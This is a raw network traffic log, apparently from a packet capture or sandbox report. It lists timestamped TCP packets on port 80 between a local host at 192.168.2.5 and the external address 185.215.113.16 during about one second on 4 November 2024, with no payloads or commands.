Nov 4, 2024 17:32:17.571464062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571474075 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571516037 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571516991 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571549892 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571556091 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571592093 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571640015 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571650982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571683884 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571697950 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571918011 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571938992 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571954966 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.571966887 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.571989059 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572007895 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572057962 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572071075 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572110891 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572361946 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572411060 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572411060 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572422981 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572448969 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572460890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572472095 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572513103 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572774887 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572823048 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.572849035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.572895050 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.613656998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.613718033 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.613722086 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.613729954 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.613763094 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.613773108 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.614626884 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.614675999 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.614681005 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.614687920 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.614721060 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.614739895 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688347101 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688364029 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688375950 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688416958 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688441038 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688621998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688647032 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688657999 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688668013 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688693047 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688700914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688713074 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688736916 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688760042 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688815117 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688833952 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.688860893 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.688868999 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689093113 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689136028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689141989 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689167023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689177990 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689213037 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689266920 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689277887 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689295053 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689307928 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689327002 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689517975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689563990 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689565897 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689578056 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689598083 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689614058 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.689727068 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689738989 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.689769983 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.730691910 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.730849028 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.730873108 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.730885983 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.730901957 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.730912924 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.730928898 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.730962992 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.731631041 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.731671095 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.731741905 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.731787920 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.731796026 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.731810093 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.731841087 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.731854916 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.804995060 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805013895 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805027962 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805072069 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805113077 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805519104 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805561066 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805574894 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805586100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805629969 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805821896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805841923 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805852890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805855989 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805864096 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805867910 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805886984 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805910110 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805911064 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805928946 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.805953026 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.805975914 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806107044 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806129932 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806140900 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806149960 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806160927 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806181908 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806368113 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806380987 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806391954 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806411982 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806430101 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806448936 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806451082 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806487083 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806716919 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806762934 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806775093 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806787014 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806809902 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806823969 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.806937933 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.806982994 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.847896099 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.847920895 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.847930908 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.847979069 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.847990036 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.848001957 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.848006964 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.848045111 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.848058939 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.848963022 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.849018097 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.849029064 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.849157095 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922447920 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922472954 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922523022 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922547102 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922558069 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922588110 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922589064 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922615051 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922626972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922641993 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922669888 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922810078 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922857046 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.922858000 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922869921 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.922909021 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923105955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923155069 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923156023 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923166990 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923202991 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923224926 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923269033 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923475027 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923521042 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923535109 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923546076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923588991 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923588991 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923672915 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923686028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923697948 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923711061 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923722982 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923734903 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923763037 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.923783064 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.923827887 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.924176931 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.924196959 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.924207926 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.924222946 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.924241066 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968286991 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968339920 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968396902 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968400002 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968416929 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968436956 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968462944 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968499899 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968512058 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968545914 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968563080 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968591928 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968606949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:17.968647003 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968660116 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:17.968674898 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.039841890 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.039897919 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.039912939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.039922953 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.039925098 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.039952993 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.039952993 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.039972067 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.039987087 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040024042 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040034056 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040046930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040069103 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040081978 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040149927 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040183067 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040302992 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040342093 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040354967 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040365934 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040394068 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040402889 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040549994 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040561914 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040574074 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040599108 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040610075 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040723085 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040735960 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040752888 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040765047 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040775061 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040790081 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040808916 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040873051 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040884972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040895939 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.040920973 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.040947914 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.041496992 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.041532993 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.041543961 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.041546106 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.041572094 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.041584015 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085387945 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085407972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085481882 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085509062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085521936 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085539103 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085552931 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085572004 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085592985 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085606098 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085642099 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085649967 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085663080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.085685968 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.085710049 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157016993 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157098055 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157109976 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157110929 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157154083 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157154083 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157169104 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157181025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157193899 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157203913 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157227039 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157289982 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157301903 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157313108 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157327890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157355070 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157557964 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157578945 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157604933 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157618999 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157628059 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157659054 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157681942 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157721043 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157923937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157964945 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.157977104 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.157989025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158013105 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158025026 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158099890 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158122063 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158132076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158134937 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158139944 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158169985 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158188105 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158257008 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158267975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158296108 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158307076 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158749104 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158770084 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158781052 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.158792019 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158803940 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.158817053 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203191042 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203205109 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203217983 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203286886 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203306913 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203326941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203326941 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203339100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203341961 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203356028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203360081 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203367949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.203381062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.203401089 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:18.274032116 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274048090 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274065971 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274101973 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:18.274117947 CET	80	49990	185.215.113.16	192.168.2.5
